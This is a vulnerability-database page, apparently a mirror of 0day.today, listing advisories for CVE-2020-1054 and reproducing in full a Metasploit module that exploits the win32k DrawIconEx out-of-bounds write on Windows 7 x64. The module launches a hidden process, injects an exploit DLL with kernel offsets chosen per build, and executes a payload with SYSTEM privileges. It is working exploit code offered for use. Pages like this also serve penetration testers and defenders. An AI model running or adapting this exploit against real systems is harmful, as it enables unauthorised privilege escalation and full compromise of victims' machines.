Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows DrawIconEx Local Privilege Escalation Exploit

🗓️ 15 Dec 2020 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 99 Views

Microsoft Windows DrawIconEx Local Privilege Escalation Exploit modul

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2020-1054
21 May 202000:00
attackerkb
ATTACKERKB		CVE-2020-1143
21 May 202000:00
attackerkb
Information Security Automation		Microsoft Patch Tuesday May 2020: comments from VM vendors, promising stuff for phishing, troubles with SharePoint and lulz with Visual Studio
13 May 202000:49
avleonov
GithubExploit		Exploit for Out-of-bounds Write in Microsoft
16 Jun 202023:22
githubexploit
Circl		CVE-2020-1054
14 May 202011:25
circl
CISA KEV Catalog		Microsoft Win32k Privilege Escalation Vulnerability
3 Nov 202100:00
cisa_kev
CNVD		Microsoft Win32k Elevation of Privilege Vulnerability (CNVD-2020-28432)
13 May 202000:00
cnvd
Check Point Advisories		Microsoft Win32k Elevation of Privilege (CVE-2020-1054)
12 May 202000:00
checkpoint_advisories
CVE		CVE-2020-1054
21 May 202022:52
cve
Cvelist		CVE-2020-1054
21 May 202022:52
cvelist
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/file'
require 'msf/core/exploit/exe'
require 'msf/core/post/windows/priv'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
        update_info(
          info,
          'Name' => 'Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation',
          'Description' => %q{
            This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx
            within win32k. The out of bounds write can be used to overwrite the pvbits of a
            SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel
            memory, an attacker can gain arbitrary code execution as the SYSTEM user.

            This module has been tested against a fully updated Windows 7 x64 SP1. Offsets
            within the exploit code may need to be adjusted to work with other versions of
            Windows.
          },
          'License' => MSF_LICENSE,
          'Author' =>
              [
                'Netanel Ben-Simon',
                'Yoav Alon',
                'bee13oy',
                'timwr', # msf module
              ],
          'Platform' => 'win',
          'SessionTypes' => ['meterpreter'],
          'Targets' =>
              [
                ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
              ],
          'DefaultTarget' => 0,
          'DefaultOptions' => {
            'WfsDelay' => 30
          },
          'Notes' =>
              {
                'Stability' => [ CRASH_OS_RESTARTS ],
                'Reliability' => [ UNRELIABLE_SESSION ]
              },
          'References' =>
              [
                ['CVE', '2020-1054'],
                ['URL', 'https://cpr-zero.checkpoint.com/vulns/cprid-2153/'],
                ['URL', 'https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html'],
                ['URL', 'https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp'],
                ['URL', 'https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp'],
                ['URL', 'https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp']
              ],
          'DisclosureDate' => '2020-02-20'
        )
    )
    register_options([
      OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])
    ])
  end

  def setup_process
    process_name = datastore['PROCESS']
    begin
      print_status("Launching #{process_name} to host the exploit...")
      launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
      process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
    process
  end

  def check
    sysinfo_value = sysinfo['OS']
    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe
    end

    file_path = expand_path('%WINDIR%\\system32\\win32k.sys')
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    build_num_gemversion = Gem::Version.new("#{major}.#{minor}.#{build}.#{revision}")
    if (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24542')) #Windows 7 SP1
      @xleft_offset = 0x900
      @oob_offset = 0x238
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24553')) #Windows 7 SP1 with patches
      @xleft_offset = 0x8c0
      @oob_offset = 0x240
      return CheckCode::Appears
    else
      return CheckCode::NotSupported
    end
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] != ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')
    end

    process = setup_process
    library_data = exploit_data('CVE-2020-1054', 'exploit.dll')
    print_status("Injecting exploit into #{process.pid} ...")
    exploit_mem, offset = inject_dll_data_into_process(process, library_data)
    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    encoded_payload = payload.encoded

    payload_mem = inject_into_process(process, [@xleft_offset, @oob_offset, encoded_payload.length].pack('LLL') + encoded_payload)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Dec 2020 00:00Current
9High risk
Vulners AI Score9
CVSS 27.2
CVSS 3.17.8
EPSS0.81456
metasploitcve-2020-1054microsoft windowselevationout of bounds writecontrol executionkernel memorysystem userwindows 7 x64reflective dll injectionexploitfile versionwin32k.sysgem version.
99